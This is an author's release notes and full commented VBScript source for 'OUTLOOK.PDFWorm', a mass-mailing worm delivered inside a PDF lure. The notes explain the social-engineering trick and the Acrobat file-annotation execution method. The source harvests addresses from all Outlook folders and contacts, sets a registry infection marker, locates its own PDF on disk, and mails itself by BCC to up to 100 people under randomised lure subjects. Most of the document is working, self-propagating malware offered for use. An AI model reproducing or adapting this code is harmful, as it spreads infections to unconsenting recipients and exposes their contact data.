Virus Name: OUTLOOK.PDFWorm
Author: Zulu
Origin: Argentina

VBScript worm. It uses OUTLOOK to send itself in a PDF (portable document format) file (first
using this file type).
When opened using Acrobat it will show an image with a minor game. Showing the solution to this
game involves doing a double click to a file annotation, which after a warning will run a VBS,
VBE or WSF file (depending of the worm version).
The VBScript file will create and show a JPG file with the solution to the game and it will try
to find the PDF file to spread it. This is necessary because when the link is used, Acrobat
will create the VBS, VBE or WSF file in Windows' temporary directory and it will run this file,
so this VBScript file doesn't know the path of the PDF file to spread.
Then it will start the spreading code using a way of using OUTLOOK not seen before in any
worm (spreading details can be found in the features section of this file).
The password for changing the security options of the PDF file is "OUTLOOK.PDFWorm".
This worm is designed to be a proof of concept, it has bad spreading capabilities, only the
necessary to be called a worm. Also, because file annotations are only available in the full
version of Acrobat, this worm will not run in Acrobat Reader.

Features:

- Uses the PDF extension, not seen before in any virus/worm.
- OUTLOOK spreading using new code, not the classic Melissa's code and it's variations like the
  one from Freelink.
  This new method will get addresses from the recipients of all emails in any OUTLOOK folder
  and from all address book entries (but taking the first three addresses of each contact, not
  just the first like most OUTLOOK worms).
  This new method is based in the possibility of reaching contacts from OUTLOOK folders instead
  of using the objects designed to read address books. So the code will look inside all OUTLOOK
  folders, and if the items inside them are emails or contacts, it will get those addresses.
  Subject, body and attachment name will be selected from some random choices. Also, it will
  limit the amount of emails to 100.
  It will be run only once in each computer since it uses the registry to check if it was
  already run.
- Good social engineering. I even think that this PDF file would be manually sent by many of
  those users that are never tired of sending stupid jokes. :)
- To find the PDF file, if Word is installed it will use it to do the search, if Word is not
  installed, it will search for the file using VBScript code looking in many common paths and
  all subdirectories of those paths. Both methods will look for PDF files with their size
  similar to the original worm copy.
- Uses script encoding (in version 1.1 and 1.2).
- The VBScript file shows a JPG file when run, so it will show what the user expects.

Background information:

I was starting another project, much bigger and with good spreading capabilities. But that was
very delayed because of time problems, so I decided to try with PDF files first and then
continue with the other worm when I have time.
I saw four possibilities:

- Using JavaScript with "mailMsg" method.
  It would only work in the full version of Acrobat.
  By using the "mailMsg" method (which uses MAPI) I could send an email message when the
  document is opened (page open action).
  But the problem was that I was not able of getting email addresses to send the message to.
- Using the Acrobat menu.
  It would only work in the full version of Acrobat.
  I could use the "Send Mail..." menu option, calling it when the document is opened (page open
  action). That would open a window from the default email client with the attachment already
  added.
  Here the problem was how to send the necessary keys to send the message that was already
  opened in that window.
- Using open file action.
  It would work in Acrobat and in Acrobat Reader. It displays a warning.
  By creating an open file action when the document is opened I could run any file with any
  code inside it.
  But the problem was that I had no file to run. This method could work for a trojan that runs
  "FORMAT.COM", but not for a worm.
- Using a file annotation.
  It would only work in the full version of Acrobat. It displays a warning.
  Creating a file annotation with my file embedded inside the PDF file I could run my code.
  Acrobat would create the embedded file in the temporary directory and it would run the file
  from there.
  This has two problems. One was knowing the path of the PDF file, this was solved by searching
  the file in the hard disk since looking in the task name would only give the file name, not
  the full path. The other problem is that it's not possible to open a file annotation
  automatically when the PDF file is opened since there is no action to do that and it seems
  that there is no way of getting the file using JavaScript code, so it was necessary that the
  user manually double clicked the file annotation. This last problem was not solved.

Of the four, the only possible way was the last one, since it's problem could have something
like a workaround by using social engineering to make the user double click the file
annotation.
So I did that. It won't be an incredible worm, but it will make the fact that viruses/worms are
also available in PDF files. I know that was already known to be possible, but there was no
working virus/worm using them.

Changes between 1.1 and 1.2:

- The VBE file used is now a WSF file with the code still encoded.
- Minor changes to find the PDF file with the new size.

Changes between 1.0 and 1.1:

- The VBS file used is now a VBE (encoded VBScript) file.
- Minor changes to find the PDF file with the new size.

Here is the VBScript code from version 1.0 (this is a special version that has comments and
unnecessary spaces were not removed):

On Error Resume Next
Dim P 'Stores the path of the PDF file. It is declared because it needs to be global but it's first used by a procedure.
Dim U() 'Array storing email addresses. This array is always one number bigger than the amount of email addresses.
ReDim U(0)

'Create and open image file showing what the user expects.

KJ="474946383961CD008D00F700000000001029001800001829001831082108002110002118002910002918003118002129002925083918082931003529042131102139102942184433104A3118315225415A2D4E60395A39086544155A5629605D2E5A6339526F466363396070446B5431775B2D746C4385683E916B3F96714AA86F43B975437B81568D8E60A68150A49369B97C4BBB905FB59C69B1A76FCA8344C98257CE9062CA9C62D6844FDA9454D79164E89762C1A66FCBA773D8A568D6B073E4A26BEDA269E4AB6BE5B2730000FF0808FF1010FF1818FF2121FF2929FF3131FF3939FF4242FF4A4AFF5252FF5A5AFF6363FF6B6BFF7373FF7B7BFFA5AD84BDC694C6AD84CEB286BDBD9CC6CE9C8484FF8C8CFF9494FF9C9CFFA5A5FFADADFFB5B5FFBDBDFFC6C6FFCECEFFE79C7BDEA587EBA47BEFAD7BDAB184E7B57FD6B294E4B38ED6BD84DEBD88E7BD84E7C18CDBC094E2C698E7C69CE7CE9CE7ADA5E7B5A5D6CEA5E2C1A5D6CEADDED2A5E7CEA5E7D6A5D6D6ADDED6ADE7D6ADE7DEADE7E7B5D6D6FFDEDEFFE7E7FFFF0000FF0808FF1010FF1818FF2121FF2929FF3131FF3939FF4242FF4A4AFF5252FF5A5AFF6363FF6B6BFF7373FF7B7BEFB573EFB57BF7A56BF7AD73F7B56BFBB173F7AD7BFBB57BFF8484FFAD84F7AD8CFF8C8CFF9494FF9C9CFFA5A5FFADADEFBD73EFB97FF3C177F9C078EFB58CF1BA86F7BD88FFBA86EFC684F3CA7FF7C684EFC68CF7CE7BFCCB7EF9C889FFCA88EFC694F3BD9CFFB994FBC694F7C69CFFC69CFFCE8CEFCE94EFB5ADEFBDADEFC6ADF7C6ADF7C6B5FFB5B5FFBDBDFFC6C6F7CE94FFCE94EFCE9CF7CE9CF7D684F7D68CFFD68CF3DA90EFDA9CF7D694F7DE94FFD694FFDE8CFFDE94FFE78CFFE794F7D69CF7DE9CFFCE9CFFD69CFFDE9CFFE79CEFCEA5EFD6A5EFDEA5EFE7A5F7D6A5F7DEA5F7E7A5FFCEA5FFD6A5FFDEA5FFE7A5FFEFA5EFDEADEFE7ADF7D6ADF7DEADF7E7ADF7EFADFFDEADFFE7ADFFEFADF7E7B5FFCEB5FFD6B5FFDEB5FFE7B5FFEFB5F7EFBDFFD6BDFFE7BDFFEFBDFFDEC6FFE7C6FFCECEFFD6D6FFDEDEFFE7E7FFEFEFFFF7F7EFEFFFF7F7FFFFFFFF2C00000000CD008D000008FE00FF091C48B0A0C18308132A5CC8B0A1C38710234A9C48B1A2C58B18336ADCC8B1A3C78F20438A1C49B2A4C9932853AA5CC9B2A5CB973063CA8CB96F5FBE7B3873EADBC76FA6CF9F20F5DDEBC428112142820629559A745021458D3EE1DB07B4AA5587FB7E614A34285020418100891D4B1690D7B38416719A7AB5EDD57D9F1411F25AB6AEDDB261031562F48BAADBBF2FF161EA1AF6AEE1C362BD1AE2A40FB06394F81881454CB972A0418DEE3DDE0C32F2E4CAA0297FCDCCB934C67C8D04855E0DFA32A6C6A6633FE4E769906AD6B8451FF225BBB7C27C8B0AE71E7EF82B26BFBE93FFF355E836F1E7860521C2A7BC373F4E83A06B2F4EA85775D3FB52FE6F1F7FF72BA7EF9BF70527CFBEAED74DE801AB77DEBEBE5841F0E3BF5D441FBA5741008215205DE3E1A75F55FC48A6DD7F8420F208279DF882532F9D70E2C8214899A5DD20E71DE81326C2E5E6D5208A78B2D342FCD8C409226085889B20DE7918D3272EAEF655229FC016113FF97062C867B90D429D8C2EDDD35F685F31924F4F17F1E30B8B355A66087244A6C4CF21220AB288661C39F9A3888D54B91226220ED209931EED83099048F226E64946BE88089722F592216B8550F96648FC2012A561A3E919123E891C8958208FEC4992277F9627488727EDA3E06A820CA9E847FA10C2DA20BDA079123F6BDAA888A7976EF448A3760DE2894B8E181A9D9BFEA56EA44F76A10992A84BFBF8592B22A4C66A1188482222A84AF8685A2B9DBE5AB44F21AB092913A3482E922C46D08226C8AA3225886A5982E433AD45896C3B562089F44A1000E8A6ABEEBAECB6BB6E42992299DFB712E5E3AA5D82207B90BBFCF6CBAE429D883B5621E6D2BBD026029BC548C103A1CB80020618804003259861062F70C4914B1C71EC62C619669081430B2EA8400208143C8CAE42CB22A9AFC1282252ABA509A17B0004071C9000052BE402073BBAC8530F39EDCCD38E3BE858B3C6196AE4D082081424A0C0CA00278C28CC0FE9732F5E8A34846E04114030C0031EB860861B6EDCF2C635EBBCB38E38E26CA30D30A8FCA0830E2A80A080FE005427B48FB1951DC230D604F992308C5E035081051204E0800752B401CB2DC8548ECD38E68C830D36C824838A283FF890430A204CD07742A75AAB23E109015BD920ABD70CC0051D58308003224CF1C61AB72403CD36DC8883F91DD844834C31AA80A2461A52E47D3A42BE6C4D5620BFB0BE50B896959B7807DC5B20C20B7568B3861A6B40930E3AD888938E39C053B34C31A98882061B2E80F0FC41B3B606A9F506FDADBF43E8E21E0A5610853CD0031DC2D8C10E4AF18D7468A31CE978473AD2018E66C00F1568B0831944703F83F44960819016FF0EB20F5A89A67A89FBC0055250053EAC631DDA58850E66A0035878431BDA70073CDEA10E7050E318FEC440C514ACC1861174D020AE3B542246883FE98D6510C3DA170050800228E0210F7778833060510619C46007B180C5309036417054A319C438C60EAE51C42316C470A03904130D720F1012228A0641170AA840073EE4E10DC8D8C63766218313B4600CA418A337BEF10D1F3E4319C7B8C53CEC60440034A48EA0B9E31C098249D120E2217A94031DF070876B5C431BD308060F58C0CA30942116B490C637A8410D65304319B7B8461B4AE04682E4EF757864DD2F5AB344000220057290431D4A090D684CA3143F90010B4C100319E44016D298C6348A518C34DE421BBBECE5404A68AD60122E60D903250056300739D8E10EC86866324C51061EB4609A26FE60812648218D60A80215A928C637D7C04B4B32C47F95A9D42607C20910163371ECB4831D4C190D6F502318C1208518BC780213C8000CB378852940910A62C0021A6E286843C86999978DB05A4A54273BDB60076B08921A8D9CC62C4A410A30C4809536B0C42954110A51A46215C320A838058250CA0822764CFC8543656AB136DC4218B304C737A0B18A59CC42163E8D410CC060894B88021491408530D64082A5FE83A59481E24205D2C943196270E7024009A4200532B0A177D0A0253480418BAF6A020C3648EC0D7830094880A20CB048435B0DBA907C981031729D2B3E12A6C9C48DC0052E90C214D4708B622C231A8CD4A92C4C218B4CDC800634B8FE810F28018932AC41B26EAD2B62088157ACEDC389F7F156E244908217BC00073B2886315CD10CD4522395C19845247860031858B7063E08C52DC830D986D008349F9CEB5B0177A81831045D1E4841715D800350B04215BE8B86EF96010C5B8402123AA8817569008319A8610A956C8823A62A5E7E144260827084313D8082F5227714AA10683292310D6004C316AA8804247A5003FD9E800533C04180516408103242BC02598F6E7AFB0FF47E60802F98C10E7E208A35ACE216C098C63252A98A538C62123EA8017F0DE93CCA26041FC0354B2750FC0F74BE4EB80B41170736F0811480760633F001F9566161692C6319C178C5292E31891EDCA0062D6881FE0932B0544F243910345BE866AD85AD2803C003781E810A5C40431D94A10C6AE8AA2BBC3A0D6988B9CC3D98E10C54C066232344C594E9AC789B4A19C19D170022F0C00636400215B440063CD841187E50065294A2149708E929C63C0949F480862D0881387F291A11329911B58295EC34B081093C000321C8670C6CA0033080E1076218C318C450D6555FA2129368C10F72D05D853CE2CD7546712FACC62B3BFBEBDBEE5248BC54C76481F083BC88419C42C0CDEE7FA12E6180B075B907DC9A29F9E41E974DB779CB8DE45A9D5826FAC05268F254EE817C1049D96E093FC4D31A4C149C209F48B258068142977042E2802004941FDE32241902AA28F945BEFED3FDEF870FA413180F8422CC19927C1CB859717EF89558A325967B241F5F42D2AD4C5E388C9B651136DF083E5EBE1A4280DCE48C8077620CE1D28F7C02DD094D38CF05326E1B9989C515D9C7B571432EAC6B5BE963D1D2D19B740F5DE146E3534F48D2B3E488B14FE41E8AF0F9B8A49EF681E8A3C4C3B94C2362BE235FC49D38815858DD13826FB04F4F4B9F58124478E4093F197E5C87083ACF7BC126AE7FC5108DE8453E78E2419B7CC2113F22D0700451888D0F1E2117DFCE5904410843282211AF7F7D2108D195CA9749D7A74F08C2DA7396DE3FFE3083C07DEE138272FB181F1085A8F8F01942F9DF1FDF2E7AE1FBF213F20B663D7F418830FDF419FEA20FB35F1F4C92DFBEC15BF57DDCA84AFC15F1C55CCA6F99E9A05F59AD72BEEAAFFE7E8CC05DEEAA170423A45FFFB7C75DFE56B708FCD77F15710F8CD015C7E715858009DA4780B2B20987807FC5210889E009E1E78014C10FBFD00873E17C67610898308018F811FC700F9CB00811A81A8591170492174971088BE0098A37820AC70FFAE00B9C8009985014B1D70898B0099DD0179C47834438125910044040044CE00745081849000450080443F0074DE81648108550F80455D8165788854930135A808443D00454B849FE70854AC8841BD18551880432E10F43808545E00F9BF4845128047DB0865808046E78107F808659501257B08740B0051AD10FFE47908481A81C59408856A08758D88706D10458C80523D10F42E0881AC10495181146000441C004650813FD1087582804FD00896D88104480854B30124E408840A08519D18A51F88A10218732F1048488051CC18650288905618B50A80422E1054848888B8811C40804C6988B58181370B88747D011C0C88708918851F88821F189B2B88C09D10742100448A08607A18D50C88D0FB18731D1887BF8051D51047B288C04E105DE9804740812BC288B85C81094188C09618F50888F11C18E30818E50888B1CD18CD8481156100444E0047958108808044270044F908AE7C88F40D0050C8190FEA0910FD1074900914F309105619009D10F10790456308A0371FE8543C004F928107F9088179991E14888E6B8110CF98507F105AD38044E701056B087B438104AB08742E0057EC8044930887BE8910BD18C62E80422F90F422985453910E2B8870449102A39105690044E008F5D808541C0847F80055B800558D80404B194A7E89446398F1FC1904C8010EE08855D798547D0979D28105F208B6B99107F4088289910C948884D391082D995FF40977B2899FFE00FD4A80503A10558F8059C89854ED99858380403519884789806819050180418D99317C1900A591082499AFFC0910939109C288B7B89107EC0930C619B425086B32910FDC08F44301057208F7B489B93099A9F198554C891B8C98FBB4910C5699B4D909515FEC190F408997B4887B60904452010FED09844B0055118043BB987AE79108E1997022198404087CF498803219AD12810CDE80752198502219D02619EE8B99A0631A0B6890435B99D787910F2C9847B580489999E02E10571899951088F079196ECF99B588805160A85B4D9A0FF108BFC3810FCA89E02918951D80FFBE89FB5298B4230A115DA9905D1A2B6A98E0A1A897CB9A148F9A22EDA9FFD88858698A1BEB910066990226A87AB798703F104CA198544A090EC7894F9498D032910406A88425A10949985FEF0074F6A91CCB887B1491022BA875A9A9F4B80857FF0A140008E04A1A1346AA4D1E8A640109F1B1AA657A0A249F90F720A8559798AFF60A3FE77EAA350E8074FF09202B1A6D0E9A6701AA641908FB979A1AFB987D5299B3C8A850E9A9FE818044DD08C5780107F0A8554F90F484004706AA8776A9A50789CFF20A2CD88986369A8C749A551B8A92E4A109DFAA95818AA04D18CE329105D0A049A69117AB9A39AAAAAFF999F0CB987381AA7844895D70904722996D10897510894679A9F083196BD1985E349A2B7AAACC378A3E5BA8A0211A66F5AA9A778055BE09ADBEAA206D9ACA068044CB098D03A950221A7CF68A2D1A8A440C08DF10A85FBEAA9093A966EEA868C3AAEB3FA0FF41A04F68AAF61DA87D31A85A54A11F40AA2EA38B0853AAF7778055CF0077EE005095A10A3BAAEFF80AD40E0ABFEBAFEA2A269971CFB0F7F608ABED8B2046BAD577A8DB87AB3BFFAB1213BB225DB9CE02A10F509A817A19ABD88A7C97AA4F9E98D0D898C520893F98A858B68AB186AB32B2BA84A3BAE2A7AA86C288CB38A857B698A0CCBAD03E1B47D08B55388A94CFA0FAA49B147E0A9DAC91093CA8FDA9AA9F29A9FE23A04FDB0058D79B526AB8C02919B319A921C59ADAFBAA1D7089FE439AB4FBA0427BBACB93A107BDBB77F5B10D318855EA0B2163BB8D91A119C2B8BAE1AB3864A9B14CA8F469010DFDAAB026187972AB9B278B5221ABA730ABB853A100B5BA2E45A8F1C99BA051A9E92289A11B1BAB23804DC38AA3B5BA8C42889C3BA9A806B105D9B8E02E18D438AB384FED8AF7EBAA1FE40AF653AAB276B90647BBB736998CF8B9C1C3904E6488CCCF910C34A8E57B098114AA0FF10A613FA89426089E4A9AE4150BD0801A401AB9F5018B427DA93F10B8AA519BD406004DA19BD0691BB47A8A6663B10FEA0BFFC6B105C10BE20BA98E26A990ED10F48C09A4DC005411B9F43B988FDE004F2588D0AE10FC9098A4950BE07A1054890894140955840044069B8A379047669A6254C107EC0049948044F10B45EE00447709106E10F4F10878F68055D4B877F8884DD499E2D1C042FCC10FE900549108742B004AEE90F4BA90423AC28DFB9856DD1B068EC136ABCC632D1C66E0C13701CC72EA1B574EC1364ABC2773C137FF0049F58B30F7B1CC8823CC8845CC886EC21010100003B"
For Y=1 To Len(KJ) Step 2
  PQ=PQ&Chr("&H"&Mid(KJ,Y,2))
Next
Set S=CreateObject("Scripting.FileSystemObject")
Set FY=S.CreateTextFile(S.BuildPath(S.GetSpecialFolder(2),"PEACH.JPG"),True)
FY.Write PQ
FY.Close
Set W=CreateObject("WScript.Shell")
W.Run S.BuildPath(S.GetSpecialFolder(2),"PEACH.JPG")

'Create and check registry key to know if it was already run.

IJ=W.RegRead("HKLM\Software\OUTLOOK.PDFWorm\")
If IJ="Version 1.0. By Zulu." Then
  WScript.Quit
Else
  W.RegWrite "HKLM\Software\OUTLOOK.PDFWorm\","Version 1.0. By Zulu."
End If

'Check if Outlook is installed.

Set C=CreateObject("Outlook.Application")
If C Is Nothing Then WScript.Quit

'Get email addresses from Outlook's address book and Outlook's emails (using OLE Automation).
'It will add them to the "U" array with the "Q" procedure using a method not seen before in any virus.

Set Z=C.GetNameSpace("MAPI")
Set N=Z.Folders(1)
Q N

'If it was not able of finding email addresses the file will stop running.

If UBound(U)=0 Then WScript.Quit

'Find duplicated addresses in the "U" array and assign an empty string in their place.

For Y=0 To UBound(U)-1
  For X=Y+1 To UBound(U)-1
    If U(Y)=U(X) And U(Y)<>"" Then U(X)=""
  Next
Next

'Remove the infected user's email addresses from the "U" array. It will check for the first 19 accounts.

For Y=1 To 9
  J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000000"&Y&"\SMTP Email Address")
  J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000000"&Y&"\SMTP Reply To Email Address")
  J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000001"&Y&"\SMTP Email Address")
  J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000001"&Y&"\SMTP Reply To Email Address")
Next
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\00000010\SMTP Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\00000010\SMTP Reply To Email Address")

'Check if there are email addresses in the "U" array after removing infected user's email addresses.

For Y=0 To UBound(U)-1
  If U(Y)<>"" Then Exit For
  If Y=UBound(U)-1 Then WScript.Quit
Next

'Check if Word is installed and search for PDF files with the correct size. When using Word the search will include all
'places in each fixed drive, the other type of search will only include usual places. The path of the PDF file will be
'stored in the "P" variable.
'I also tried looking for the task name using "Tasks.Item().Name" from Word, but it was only possible to find the file
'name, not the full path of the file, so a search is needed.

Set A=CreateObject("Word.Application")
If A Is Nothing Then
  For Each B In S.Drives
    If B.DriveType=2 Then
      E B.DriveLetter&":\"
      If P<>"" Then Exit For
    End If
  Next
  If P="" Then E S.GetSpecialFolder(2)
  If P="" Then E W.SpecialFolders("Desktop")
  If P="" Then E W.SpecialFolders("MyDocuments")
  If P="" Then E W.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
Else
  Set G=A.FileSearch
  G.NewSearch
  G.FileName="*.PDF"
  G.SearchSubFolders=True
  'Do the search in each drive while the file is not found.
  For Each B In S.Drives
    If B.DriveType=2 Then
      G.LookIn=B.DriveLetter&":\"
      G.Execute
      If G.FoundFiles.Count>0 Then
        For Y=1 To G.FoundFiles.Count
          Set L=S.GetFile(G.FoundFiles(Y))
          If L.Size>168230 And L.Size<168250 Then
            P=G.FoundFiles(Y)
            Exit For
          End If
        Next
        If P<>"" Then Exit For
      Else
        G.NewSearch
        G.FileName="*.PDF"
        G.SearchSubFolders=True
      End If
    End If
  Next
  A.Quit
End If

'If the path is not found ("P" is empty) the file will stop running.

If P="" Then WScript.Quit

'Create a string with values from the "U" array (to be used as the BCC part of the email message).
'It will limit the amount of email addresses to 100.

If UBound(U)-1<100 Then
  For Y=0 To UBound(U)-1
    If U(Y)<>"" Then
      If T="" Then T=U(Y) Else T=T&";"&U(Y)
    End If
  Next
Else
  Dim JD(99)
  For Y=0 To 99
    JD(Y)=Int(UBound(U)*Rnd)
  Next
  For Y=0 To 99
    For X=Y+1 To 99
      If JD(Y)=JD(X) And JD(Y)<>-1 Then JD(X)=-1
    Next
  Next
  For Y=0 To 99
    If JD(Y)=-1 Then JD(Y)=Int(UBound(U)*Rnd)
  Next
  For Y=0 To 99
    For X=Y+1 To 99
      If JD(Y)=JD(X) And JD(Y)<>-1 Then JD(X)=-1
    Next
  Next
  For Y=0 To 99
    If JD(Y)<>-1 And U(JD(Y))<>"" Then
      If T="" Then T=U(JD(Y)) Else T=T&";"&U(JD(Y))
    End If
  Next
End If

'Set subject, body and attachment name.

Randomize
If Int(2*Rnd)=0 Then O="Fw: "
EY=Int(5*Rnd)
If EY=0 Then
  O=O&"You have one minute to find the peach"
ElseIf EY=1 Then
  O=O&"Find the peach"
ElseIf EY=2 Then
  O=O&"Find"
ElseIf EY=3 Then
  O=O&"Peach"
Else
  O=O&"Joke"
End If
If Int(2*Rnd)=0 Then O=O&"!"
If Int(4*Rnd)=0 Then O=UCase(O)
If Int(2*Rnd)=0 Then F="> "
EY=Int(5*Rnd)
If EY=0 Then
  If Left(O,2)="Fw" Then F=F&Mid(O,5) Else F=F&O
ElseIf EY=1 Then
  F=F&"Try finding the peach"
ElseIf EY=2 Then
  F=F&"Try this"
ElseIf EY=3 Then
  F=F&"Interesting search"
Else
  F=F&"I don't usually send this things, but..."
End If
If EY<4 Then
  If Int(2*Rnd)=0 Then F=F&"!"
End If
EY=Int(5*Rnd)
If EY=0 Then
  F=F&" :-)"
ElseIf EY=1 Then
  F=F&" :)"
ElseIf EY=2 Then
  F=F&" =)"
ElseIf EY=3 Then
  F=F&" :-]"
End If
If Int(4*Rnd)=0 Then F=UCase(F)
EY=Int(6*Rnd)
If EY=0 Then
  SW="find.pdf"
ElseIf EY=1 Then
  SW="peach.pdf"
ElseIf EY=2 Then
  SW="find the peach.pdf"
ElseIf EY=3 Then
  SW="find_the_peach.pdf"
ElseIf EY=4 Then
  SW="joke.pdf"
Else
  SW="search.pdf"
End If
EY=Int(3*Rnd)
If EY=0 Then
  SW=UCase(Left(SW,1))&Mid(SW,2)
ElseIf EY=1 Then
  SW=UCase(SW)
End If
SW=S.BuildPath(S.GetSpecialFolder(2),SW)

'Copy PDF file to the temporary directory.

S.CopyFile P,SW

'Send email message.

Set H=C.CreateItem(0)
H.BCC=T
H.Subject=O
If Int(2*Rnd)=0 Then H.Body=F Else H.HTMLBody=F
H.Attachments.Add SW
H.DeleteAfterSubmit=True
H.Send

'Delete PDF file from the temporary directory.

S.DeleteFile SW,True

'Recursive procedure used to get email addresses from Outlook and add them to the "U" array. It will get addresses from
'each contact in the address book (using a method not seen before in any worm and getting the first three addresses of
'each contact) and from the recipients of all emails found in any Outlook folder.

Sub Q(I)
  On Error Resume Next
  For Each B In I.Items
    'If the item is a contact (it will give an error and continue if not), get it's first three email addresses.
    If B.Email1Address<>"" Then D B.Email1Address
    If B.Email2Address<>"" Then D B.Email2Address
    If B.Email3Address<>"" Then D B.Email3Address
    'If the item is an email (it will give an error and continue if not), get the email addresses of all recipients.
    For Each R In B.Recipients
      D R.Address
    Next
  Next
  'Use the procedure with all subfolders.
  For Each B In I.Folders
    Q B
  Next
End Sub

'Procedure that adds a value to the "U" array and changes the size of that array.

Sub D(M)
  On Error Resume Next
  U(UBound(U))=M
  ReDim Preserve U(UBound(U)+1)
End Sub

'Procedure that checks if the email address passed as parameter is available in the "U" array and, if so, it assigns an
'empty string in that array index.

Sub J(V)
  On Error Resume Next
  For X=0 To UBound(U)-1
    If UCase(U(X))=UCase(V) Then
      U(X)=""
      Exit For
    End If
  Next
End Sub

'Recursive procedure used when searching for the PDF file without using Word. It will try finding the PDF file by looking
'for files with that extension and the correct size. If the file is not found in the specified directory it will look
'for all subdirectories and it will call itself using them as the new parameter.

Sub E(K)
  On Error Resume Next
  If S.FolderExists(K) Then
    'Check all files in the specified directory.
    For Each R In S.GetFolder(K).Files
      If UCase(S.GetExtensionName(R.Name))="PDF" Then
        If R.Size>168230 And R.Size<168250 Then
          P=R.Path
          Exit For
        End If
      End If
    Next
    'If the file was not found and the directory is not root, use the procedure with all subdirectories.
    If P="" And Right(K,2)<>":\" Then
      For Each R In S.GetFolder(K).SubFolders
        E R.Path
      Next
    End If
  End If
End Sub